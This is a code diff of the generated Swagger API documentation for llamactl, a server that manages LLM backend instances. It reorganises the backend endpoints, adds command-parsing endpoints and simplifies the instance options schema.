"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server",
"tags": [
"backends"
],
"summary": "List available devices for llama server",
"responses": {
"200": {
"description": "List of devices",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/llama-cpp/help": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command",
"tags": [
"backends"
],
"summary": "Get help for llama server",
"responses": {
"200": {
"description": "Help text",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/llama-cpp/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses a llama-server command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse llama-server command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/backends/llama-cpp/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command",
"tags": [
"backends"
],
"summary": "Get version of llama server",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/mlx/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses MLX-LM server command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse mlx_lm.server command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/backends/vllm/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses a vLLM serve command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse vllm serve command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/instances": {
"get": {
"security": [
@@ -505,90 +742,6 @@ const docTemplate = `{
}
}
},
"/server/devices": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server",
"tags": [
"server"
],
"summary": "List available devices for llama server",
"responses": {
"200": {
"description": "List of devices",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/server/help": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command",
"tags": [
"server"
],
"summary": "Get help for llama server",
"responses": {
"200": {
"description": "Help text",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/server/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command",
"tags": [
"server"
],
"summary": "Get version of llama server",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/v1/": {
"post": {
"security": [
@@ -609,7 +762,7 @@ const docTemplate = `{
"description": "OpenAI response"
},
"400": {
"description": "Invalid request body or model name",
"description": "Invalid request body or instance name",
"schema": {
"type": "string"
}
@@ -681,519 +834,63 @@ const docTemplate = `{
}
},
"definitions": {
"backends.BackendType": {
"type": "string",
"enum": [
"llama_cpp",
"mlx_lm",
"vllm"
],
"x-enum-varnames": [
"BackendTypeLlamaCpp",
"BackendTypeMlxLm",
"BackendTypeVllm"
]
},
"instance.CreateInstanceOptions": {
"type": "object",
"properties": {
"alias": {
"type": "string"
},
"api_key": {
"type": "string"
},
"api_key_file": {
"type": "string"
},
"auto_restart": {
"description": "Auto restart",
"type": "boolean"
},
"batch_size": {
"type": "integer"
"backend_options": {
"type": "object",
"additionalProperties": {}
},
"cache_reuse": {
"type": "integer"
"backend_type": {
"$ref": "#/definitions/backends.BackendType"
},
"cache_type_k": {
"type": "string"
},
"cache_type_k_draft": {
"type": "string"
},
"cache_type_v": {
"type": "string"
},
"cache_type_v_draft": {
"type": "string"
},
"chat_template": {
"type": "string"
},
"chat_template_file": {
"type": "string"
},
"chat_template_kwargs": {
"type": "string"
},
"check_tensors": {
"type": "boolean"
},
"cont_batching": {
"type": "boolean"
},
"control_vector": {
"type": "array",
"items": {
"type": "string"
}
},
"control_vector_layer_range": {
"type": "string"
},
"control_vector_scaled": {
"type": "array",
"items": {
"type": "string"
}
},
"cpu_mask": {
"type": "string"
},
"cpu_mask_batch": {
"type": "string"
},
"cpu_range": {
"type": "string"
},
"cpu_range_batch": {
"type": "string"
},
"cpu_strict": {
"type": "integer"
},
"cpu_strict_batch": {
"type": "integer"
},
"ctx_size": {
"type": "integer"
},
"ctx_size_draft": {
"type": "integer"
},
"defrag_thold": {
"type": "number"
},
"device": {
"type": "string"
},
"device_draft": {
"type": "string"
},
"draft_max": {
"type": "integer"
},
"draft_min": {
"type": "integer"
},
"draft_p_min": {
"type": "number"
},
"dry_allowed_length": {
"type": "integer"
},
"dry_base": {
"type": "number"
},
"dry_multiplier": {
"type": "number"
},
"dry_penalty_last_n": {
"type": "integer"
},
"dry_sequence_breaker": {
"type": "array",
"items": {
"type": "string"
}
},
"dump_kv_cache": {
"type": "boolean"
},
"dynatemp_exp": {
"type": "number"
},
"dynatemp_range": {
"type": "number"
},
"embd_bge_small_en_default": {
"description": "Default model params",
"type": "boolean"
},
"embd_e5_small_en_default": {
"type": "boolean"
},
"embd_gte_small_default": {
"type": "boolean"
},
"embedding": {
"type": "boolean"
},
"escape": {
"type": "boolean"
},
"fim_qwen_14b_spec": {
"type": "boolean"
},
"fim_qwen_1_5b_default": {
"type": "boolean"
},
"fim_qwen_3b_default": {
"type": "boolean"
},
"fim_qwen_7b_default": {
"type": "boolean"
},
"fim_qwen_7b_spec": {
"type": "boolean"
},
"flash_attn": {
"type": "boolean"
},
"frequency_penalty": {
"type": "number"
},
"gpu_layers": {
"type": "integer"
},
"gpu_layers_draft": {
"type": "integer"
},
"grammar": {
"type": "string"
},
"grammar_file": {
"type": "string"
},
"hf_file": {
"type": "string"
},
"hf_file_v": {
"type": "string"
},
"hf_repo": {
"type": "string"
},
"hf_repo_draft": {
"type": "string"
},
"hf_repo_v": {
"type": "string"
},
"hf_token": {
"type": "string"
},
"host": {
"type": "string"
},
"ignore_eos": {
"type": "boolean"
},
"jinja": {
"type": "boolean"
},
"json_schema": {
"type": "string"
},
"json_schema_file": {
"type": "string"
},
"keep": {
"type": "integer"
},
"log_colors": {
"type": "boolean"
},
"log_disable": {
"type": "boolean"
},
"log_file": {
"type": "string"
},
"log_prefix": {
"type": "boolean"
},
"log_timestamps": {
"type": "boolean"
},
"logit_bias": {
"type": "array",
"items": {
"type": "string"
}
},
"lora": {
"type": "array",
"items": {
"type": "string"
}
},
"lora_init_without_apply": {
"type": "boolean"
},
"lora_scaled": {
"type": "array",
"items": {
"type": "string"
}
},
"main_gpu": {
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"max_restarts": {
"type": "integer"
},
"metrics": {
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"min_p": {
"type": "number"
},
"mirostat": {
"type": "integer"
},
"mirostat_ent": {
"type": "number"
},
"mirostat_lr": {
"type": "number"
},
"mlock": {
"type": "boolean"
},
"mmproj": {
"type": "string"
},
"mmproj_url": {
"type": "string"
},
"model": {
"type": "string"
},
"model_draft": {
"type": "string"
},
"model_url": {
"type": "string"
},
"model_vocoder": {
"description": "Audio/TTS params",
"type": "string"
},
"no_cont_batching": {
"type": "boolean"
},
"no_context_shift": {
"description": "Example-specific params",
"type": "boolean"
},
"no_escape": {
"type": "boolean"
},
"no_kv_offload": {
"type": "boolean"
},
"no_mmap": {
"type": "boolean"
},
"no_mmproj": {
"type": "boolean"
},
"no_mmproj_offload": {
"type": "boolean"
},
"no_perf": {
"type": "boolean"
},
"no_prefill_assistant": {
"type": "boolean"
},
"no_slots": {
"type": "boolean"
},
"no_warmup": {
"type": "boolean"
},
"no_webui": {
"type": "boolean"
},
"numa": {
"type": "string"
},
"override_kv": {
"type": "array",
"items": {
"type": "string"
}
},
"override_tensor": {
"type": "array",
"items": {
"type": "string"
}
},
"parallel": {
"type": "integer"
},
"path": {
"type": "string"
},
"poll": {
"type": "integer"
},
"poll_batch": {
"type": "integer"
},
"pooling": {
"type": "string"
},
"port": {
"type": "integer"
},
"predict": {
"type": "integer"
},
"presence_penalty": {
"type": "number"
},
"prio": {
"type": "integer"
},
"prio_batch": {
"type": "integer"
},
"props": {
"type": "boolean"
},
"reasoning_budget": {
"type": "integer"
},
"reasoning_format": {
"type": "string"
},
"repeat_last_n": {
"type": "integer"
},
"repeat_penalty": {
"type": "number"
},
"reranking": {
"type": "boolean"
},
"restart_delay_seconds": {
"description": "RestartDelay duration in seconds",
"type": "integer"
},
"rope_freq_base": {
"type": "number"
},
"rope_freq_scale": {
"type": "number"
},
"rope_scale": {
"type": "number"
},
"rope_scaling": {
"type": "string"
},
"samplers": {
"description": "Sampling params",
"type": "string"
},
"sampling_seq": {
"type": "string"
},
"seed": {
"type": "integer"
},
"slot_prompt_similarity": {
"type": "number"
},
"slot_save_path": {
"type": "string"
},
"slots": {
"type": "boolean"
},
"special": {
"type": "boolean"
},
"split_mode": {
"type": "string"
},
"spm_infill": {
"type": "boolean"
},
"ssl_cert_file": {
"type": "string"
},
"ssl_key_file": {
"type": "string"
},
"temp": {
"type": "number"
},
"tensor_split": {
"type": "string"
},
"threads": {
"type": "integer"
},
"threads_batch": {
"type": "integer"
},
"threads_http": {
"type": "integer"
},
"timeout": {
"type": "integer"
},
"top_k": {
"type": "integer"
},
"top_p": {
"type": "number"
},
"tts_use_guide_tokens": {
"type": "boolean"
},
"typical": {
"type": "number"
},
"ubatch_size": {
"type": "integer"
},
"verbose": {
"type": "boolean"
},
"verbose_prompt": {
"description": "Common params",
"type": "boolean"
},
"verbosity": {
"type": "integer"
},
"xtc_probability": {
"type": "number"
},
"xtc_threshold": {
"type": "number"
},
"yarn_attn_factor": {
"type": "number"
},
"yarn_beta_fast": {
"type": "number"
},
"yarn_beta_slow": {
"type": "number"
},
"yarn_ext_factor": {
"type": "number"
},
"yarn_orig_ctx": {
"restart_delay": {
"description": "seconds",
"type": "integer"
}
}
},
"instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": {
"type": "object",
"properties": {
@@ -1204,9 +901,13 @@ const docTemplate = `{
"name": {
"type": "string"
},
"running": {
"status": {
"description": "Status",
"type": "boolean"
"allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
}
}
},
@@ -1240,6 +941,14 @@ const docTemplate = `{
"type": "string"
}
}
},
"server.ParseCommandRequest": {
"type": "object",
"properties": {
"command": {
"type": "string"
}
}
}
}
}`
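
The new `parse-command` endpoints documented above accept a raw backend command string and return the equivalent instance options. A sketch of calling the llama.cpp variant, assuming the management API key setup from the README (`Bearer your-key`) and the default base path `/api/v1`:

```bash
# Parse a llama-server command into CreateInstanceOptions
curl -X POST localhost:8080/api/v1/backends/llama-cpp/parse-command \
  -H "Authorization: Bearer your-key" \
  -H "Content-Type: application/json" \
  -d '{"command": "llama-server --model /path/to/model.gguf --port 8081"}'
```

On success the response is a `CreateInstanceOptions` object with `backend_type` set to `llama_cpp` and the recognized flags mapped into `backend_options`.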


@@ -12,6 +12,243 @@
},
"basePath": "/api/v1",
"paths": {
"/backends/llama-cpp/devices": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server",
"tags": [
"backends"
],
"summary": "List available devices for llama server",
"responses": {
"200": {
"description": "List of devices",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/llama-cpp/help": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command",
"tags": [
"backends"
],
"summary": "Get help for llama server",
"responses": {
"200": {
"description": "Help text",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/llama-cpp/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses a llama-server command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse llama-server command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/backends/llama-cpp/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command",
"tags": [
"backends"
],
"summary": "Get version of llama server",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/backends/mlx/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses MLX-LM server command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse mlx_lm.server command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/backends/vllm/parse-command": {
"post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Parses a vLLM serve command string into instance options",
"consumes": [
"application/json"
],
"produces": [
"application/json"
],
"tags": [
"backends"
],
"summary": "Parse vllm serve command",
"parameters": [
{
"description": "Command to parse",
"name": "request",
"in": "body",
"required": true,
"schema": {
"$ref": "#/definitions/server.ParseCommandRequest"
}
}
],
"responses": {
"200": {
"description": "Parsed options",
"schema": {
"$ref": "#/definitions/instance.CreateInstanceOptions"
}
},
"400": {
"description": "Invalid request or command",
"schema": {
"type": "object",
"additionalProperties": {
"type": "string"
}
}
}
}
}
},
"/instances": {
"get": {
"security": [
@@ -498,90 +735,6 @@
}
}
},
"/server/devices": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server",
"tags": [
"server"
],
"summary": "List available devices for llama server",
"responses": {
"200": {
"description": "List of devices",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/server/help": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command",
"tags": [
"server"
],
"summary": "Get help for llama server",
"responses": {
"200": {
"description": "Help text",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/server/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command",
"tags": [
"server"
],
"summary": "Get version of llama server",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/v1/": {
"post": {
"security": [
@@ -602,7 +755,7 @@
"description": "OpenAI response"
},
"400": {
"description": "Invalid request body or model name",
"description": "Invalid request body or instance name",
"schema": {
"type": "string"
}
@@ -674,519 +827,63 @@
}
},
"definitions": {
"backends.BackendType": {
"type": "string",
"enum": [
"llama_cpp",
"mlx_lm",
"vllm"
],
"x-enum-varnames": [
"BackendTypeLlamaCpp",
"BackendTypeMlxLm",
"BackendTypeVllm"
]
},
"instance.CreateInstanceOptions": {
"type": "object",
"properties": {
"alias": {
"type": "string"
},
"api_key": {
"type": "string"
},
"api_key_file": {
"type": "string"
},
"auto_restart": {
"description": "Auto restart",
"type": "boolean"
},
"batch_size": {
"type": "integer"
"backend_options": {
"type": "object",
"additionalProperties": {}
},
"cache_reuse": {
"type": "integer"
"backend_type": {
"$ref": "#/definitions/backends.BackendType"
},
"cache_type_k": {
"type": "string"
},
"cache_type_k_draft": {
"type": "string"
},
"cache_type_v": {
"type": "string"
},
"cache_type_v_draft": {
"type": "string"
},
"chat_template": {
"type": "string"
},
"chat_template_file": {
"type": "string"
},
"chat_template_kwargs": {
"type": "string"
},
"check_tensors": {
"type": "boolean"
},
"cont_batching": {
"type": "boolean"
},
"control_vector": {
"type": "array",
"items": {
"type": "string"
}
},
"control_vector_layer_range": {
"type": "string"
},
"control_vector_scaled": {
"type": "array",
"items": {
"type": "string"
}
},
"cpu_mask": {
"type": "string"
},
"cpu_mask_batch": {
"type": "string"
},
"cpu_range": {
"type": "string"
},
"cpu_range_batch": {
"type": "string"
},
"cpu_strict": {
"type": "integer"
},
"cpu_strict_batch": {
"type": "integer"
},
"ctx_size": {
"type": "integer"
},
"ctx_size_draft": {
"type": "integer"
},
"defrag_thold": {
"type": "number"
},
"device": {
"type": "string"
},
"device_draft": {
"type": "string"
},
"draft_max": {
"type": "integer"
},
"draft_min": {
"type": "integer"
},
"draft_p_min": {
"type": "number"
},
"dry_allowed_length": {
"type": "integer"
},
"dry_base": {
"type": "number"
},
"dry_multiplier": {
"type": "number"
},
"dry_penalty_last_n": {
"type": "integer"
},
"dry_sequence_breaker": {
"type": "array",
"items": {
"type": "string"
}
},
"dump_kv_cache": {
"type": "boolean"
},
"dynatemp_exp": {
"type": "number"
},
"dynatemp_range": {
"type": "number"
},
"embd_bge_small_en_default": {
"description": "Default model params",
"type": "boolean"
},
"embd_e5_small_en_default": {
"type": "boolean"
},
"embd_gte_small_default": {
"type": "boolean"
},
"embedding": {
"type": "boolean"
},
"escape": {
"type": "boolean"
},
"fim_qwen_14b_spec": {
"type": "boolean"
},
"fim_qwen_1_5b_default": {
"type": "boolean"
},
"fim_qwen_3b_default": {
"type": "boolean"
},
"fim_qwen_7b_default": {
"type": "boolean"
},
"fim_qwen_7b_spec": {
"type": "boolean"
},
"flash_attn": {
"type": "boolean"
},
"frequency_penalty": {
"type": "number"
},
"gpu_layers": {
"type": "integer"
},
"gpu_layers_draft": {
"type": "integer"
},
"grammar": {
"type": "string"
},
"grammar_file": {
"type": "string"
},
"hf_file": {
"type": "string"
},
"hf_file_v": {
"type": "string"
},
"hf_repo": {
"type": "string"
},
"hf_repo_draft": {
"type": "string"
},
"hf_repo_v": {
"type": "string"
},
"hf_token": {
"type": "string"
},
"host": {
"type": "string"
},
"ignore_eos": {
"type": "boolean"
},
"jinja": {
"type": "boolean"
},
"json_schema": {
"type": "string"
},
"json_schema_file": {
"type": "string"
},
"keep": {
"type": "integer"
},
"log_colors": {
"type": "boolean"
},
"log_disable": {
"type": "boolean"
},
"log_file": {
"type": "string"
},
"log_prefix": {
"type": "boolean"
},
"log_timestamps": {
"type": "boolean"
},
"logit_bias": {
"type": "array",
"items": {
"type": "string"
}
},
"lora": {
"type": "array",
"items": {
"type": "string"
}
},
"lora_init_without_apply": {
"type": "boolean"
},
"lora_scaled": {
"type": "array",
"items": {
"type": "string"
}
},
"main_gpu": {
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"max_restarts": {
"type": "integer"
},
"metrics": {
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"min_p": {
"type": "number"
},
"mirostat": {
"type": "integer"
},
"mirostat_ent": {
"type": "number"
},
"mirostat_lr": {
"type": "number"
},
"mlock": {
"type": "boolean"
},
"mmproj": {
"type": "string"
},
"mmproj_url": {
"type": "string"
},
"model": {
"type": "string"
},
"model_draft": {
"type": "string"
},
"model_url": {
"type": "string"
},
"model_vocoder": {
"description": "Audio/TTS params",
"type": "string"
},
"no_cont_batching": {
"type": "boolean"
},
"no_context_shift": {
"description": "Example-specific params",
"type": "boolean"
},
"no_escape": {
"type": "boolean"
},
"no_kv_offload": {
"type": "boolean"
},
"no_mmap": {
"type": "boolean"
},
"no_mmproj": {
"type": "boolean"
},
"no_mmproj_offload": {
"type": "boolean"
},
"no_perf": {
"type": "boolean"
},
"no_prefill_assistant": {
"type": "boolean"
},
"no_slots": {
"type": "boolean"
},
"no_warmup": {
"type": "boolean"
},
"no_webui": {
"type": "boolean"
},
"numa": {
"type": "string"
},
"override_kv": {
"type": "array",
"items": {
"type": "string"
}
},
"override_tensor": {
"type": "array",
"items": {
"type": "string"
}
},
"parallel": {
"type": "integer"
},
"path": {
"type": "string"
},
"poll": {
"type": "integer"
},
"poll_batch": {
"type": "integer"
},
"pooling": {
"type": "string"
},
"port": {
"type": "integer"
},
"predict": {
"type": "integer"
},
"presence_penalty": {
"type": "number"
},
"prio": {
"type": "integer"
},
"prio_batch": {
"type": "integer"
},
"props": {
"type": "boolean"
},
"reasoning_budget": {
"type": "integer"
},
"reasoning_format": {
"type": "string"
},
"repeat_last_n": {
"type": "integer"
},
"repeat_penalty": {
"type": "number"
},
"reranking": {
"type": "boolean"
},
"restart_delay_seconds": {
"description": "RestartDelay duration in seconds",
"type": "integer"
},
"rope_freq_base": {
"type": "number"
},
"rope_freq_scale": {
"type": "number"
},
"rope_scale": {
"type": "number"
},
"rope_scaling": {
"type": "string"
},
"samplers": {
"description": "Sampling params",
"type": "string"
},
"sampling_seq": {
"type": "string"
},
"seed": {
"type": "integer"
},
"slot_prompt_similarity": {
"type": "number"
},
"slot_save_path": {
"type": "string"
},
"slots": {
"type": "boolean"
},
"special": {
"type": "boolean"
},
"split_mode": {
"type": "string"
},
"spm_infill": {
"type": "boolean"
},
"ssl_cert_file": {
"type": "string"
},
"ssl_key_file": {
"type": "string"
},
"temp": {
"type": "number"
},
"tensor_split": {
"type": "string"
},
"threads": {
"type": "integer"
},
"threads_batch": {
"type": "integer"
},
"threads_http": {
"type": "integer"
},
"timeout": {
"type": "integer"
},
"top_k": {
"type": "integer"
},
"top_p": {
"type": "number"
},
"tts_use_guide_tokens": {
"type": "boolean"
},
"typical": {
"type": "number"
},
"ubatch_size": {
"type": "integer"
},
"verbose": {
"type": "boolean"
},
"verbose_prompt": {
"description": "Common params",
"type": "boolean"
},
"verbosity": {
"type": "integer"
},
"xtc_probability": {
"type": "number"
},
"xtc_threshold": {
"type": "number"
},
"yarn_attn_factor": {
"type": "number"
},
"yarn_beta_fast": {
"type": "number"
},
"yarn_beta_slow": {
"type": "number"
},
"yarn_ext_factor": {
"type": "number"
},
"yarn_orig_ctx": {
"restart_delay": {
"description": "seconds",
"type": "integer"
}
}
},
"instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": {
"type": "object",
"properties": {
@@ -1197,9 +894,13 @@
"name": {
"type": "string"
},
"running": {
"status": {
"description": "Status",
"type": "boolean"
"allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
}
}
},
@@ -1233,6 +934,14 @@
"type": "string"
}
}
},
"server.ParseCommandRequest": {
"type": "object",
"properties": {
"command": {
"type": "string"
}
}
}
}
}

View File

@@ -1,349 +1,47 @@
basePath: /api/v1
definitions:
backends.BackendType:
enum:
- llama_cpp
- mlx_lm
- vllm
type: string
x-enum-varnames:
- BackendTypeLlamaCpp
- BackendTypeMlxLm
- BackendTypeVllm
instance.CreateInstanceOptions:
properties:
alias:
type: string
api_key:
type: string
api_key_file:
type: string
auto_restart:
description: Auto restart
type: boolean
batch_size:
type: integer
cache_reuse:
type: integer
cache_type_k:
type: string
cache_type_k_draft:
type: string
cache_type_v:
type: string
cache_type_v_draft:
type: string
chat_template:
type: string
chat_template_file:
type: string
chat_template_kwargs:
type: string
check_tensors:
type: boolean
cont_batching:
type: boolean
control_vector:
items:
type: string
type: array
control_vector_layer_range:
type: string
control_vector_scaled:
items:
type: string
type: array
cpu_mask:
type: string
cpu_mask_batch:
type: string
cpu_range:
type: string
cpu_range_batch:
type: string
cpu_strict:
type: integer
cpu_strict_batch:
type: integer
ctx_size:
type: integer
ctx_size_draft:
type: integer
defrag_thold:
type: number
device:
type: string
device_draft:
type: string
draft_max:
type: integer
draft_min:
type: integer
draft_p_min:
type: number
dry_allowed_length:
type: integer
dry_base:
type: number
dry_multiplier:
type: number
dry_penalty_last_n:
type: integer
dry_sequence_breaker:
items:
type: string
type: array
dump_kv_cache:
type: boolean
dynatemp_exp:
type: number
dynatemp_range:
type: number
embd_bge_small_en_default:
description: Default model params
type: boolean
embd_e5_small_en_default:
type: boolean
embd_gte_small_default:
type: boolean
embedding:
type: boolean
escape:
type: boolean
fim_qwen_1_5b_default:
type: boolean
fim_qwen_3b_default:
type: boolean
fim_qwen_7b_default:
type: boolean
fim_qwen_7b_spec:
type: boolean
fim_qwen_14b_spec:
type: boolean
flash_attn:
type: boolean
frequency_penalty:
type: number
gpu_layers:
type: integer
gpu_layers_draft:
type: integer
grammar:
type: string
grammar_file:
type: string
hf_file:
type: string
hf_file_v:
type: string
hf_repo:
type: string
hf_repo_draft:
type: string
hf_repo_v:
type: string
hf_token:
type: string
host:
type: string
ignore_eos:
type: boolean
jinja:
type: boolean
json_schema:
type: string
json_schema_file:
type: string
keep:
type: integer
log_colors:
type: boolean
log_disable:
type: boolean
log_file:
type: string
log_prefix:
type: boolean
log_timestamps:
type: boolean
logit_bias:
items:
type: string
type: array
lora:
items:
type: string
type: array
lora_init_without_apply:
type: boolean
lora_scaled:
items:
type: string
type: array
main_gpu:
backend_options:
additionalProperties: {}
type: object
backend_type:
$ref: '#/definitions/backends.BackendType'
idle_timeout:
description: Idle timeout
type: integer
max_restarts:
type: integer
metrics:
on_demand_start:
description: On demand start
type: boolean
min_p:
type: number
mirostat:
type: integer
mirostat_ent:
type: number
mirostat_lr:
type: number
mlock:
type: boolean
mmproj:
type: string
mmproj_url:
type: string
model:
type: string
model_draft:
type: string
model_url:
type: string
model_vocoder:
description: Audio/TTS params
type: string
no_cont_batching:
type: boolean
no_context_shift:
description: Example-specific params
type: boolean
no_escape:
type: boolean
no_kv_offload:
type: boolean
no_mmap:
type: boolean
no_mmproj:
type: boolean
no_mmproj_offload:
type: boolean
no_perf:
type: boolean
no_prefill_assistant:
type: boolean
no_slots:
type: boolean
no_warmup:
type: boolean
no_webui:
type: boolean
numa:
type: string
override_kv:
items:
type: string
type: array
override_tensor:
items:
type: string
type: array
parallel:
type: integer
path:
type: string
poll:
type: integer
poll_batch:
type: integer
pooling:
type: string
port:
type: integer
predict:
type: integer
presence_penalty:
type: number
prio:
type: integer
prio_batch:
type: integer
props:
type: boolean
reasoning_budget:
type: integer
reasoning_format:
type: string
repeat_last_n:
type: integer
repeat_penalty:
type: number
reranking:
type: boolean
restart_delay_seconds:
description: RestartDelay duration in seconds
type: integer
rope_freq_base:
type: number
rope_freq_scale:
type: number
rope_scale:
type: number
rope_scaling:
type: string
samplers:
description: Sampling params
type: string
sampling_seq:
type: string
seed:
type: integer
slot_prompt_similarity:
type: number
slot_save_path:
type: string
slots:
type: boolean
special:
type: boolean
split_mode:
type: string
spm_infill:
type: boolean
ssl_cert_file:
type: string
ssl_key_file:
type: string
temp:
type: number
tensor_split:
type: string
threads:
type: integer
threads_batch:
type: integer
threads_http:
type: integer
timeout:
type: integer
top_k:
type: integer
top_p:
type: number
tts_use_guide_tokens:
type: boolean
typical:
type: number
ubatch_size:
type: integer
verbose:
type: boolean
verbose_prompt:
description: Common params
type: boolean
verbosity:
type: integer
xtc_probability:
type: number
xtc_threshold:
type: number
yarn_attn_factor:
type: number
yarn_beta_fast:
type: number
yarn_beta_slow:
type: number
yarn_ext_factor:
type: number
yarn_orig_ctx:
restart_delay:
description: seconds
type: integer
type: object
instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process:
properties:
created:
@@ -351,9 +49,10 @@ definitions:
type: integer
name:
type: string
running:
status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status
type: boolean
type: object
server.OpenAIInstance:
properties:
@@ -375,6 +74,11 @@ definitions:
object:
type: string
type: object
server.ParseCommandRequest:
properties:
command:
type: string
type: object
info:
contact: {}
description: llamactl is a control server for managing Llama Server instances.
@@ -384,6 +88,153 @@ info:
title: llamactl API
version: "1.0"
paths:
/backends/llama-cpp/devices:
get:
description: Returns a list of available devices for the llama server
responses:
"200":
description: List of devices
schema:
type: string
"500":
description: Internal Server Error
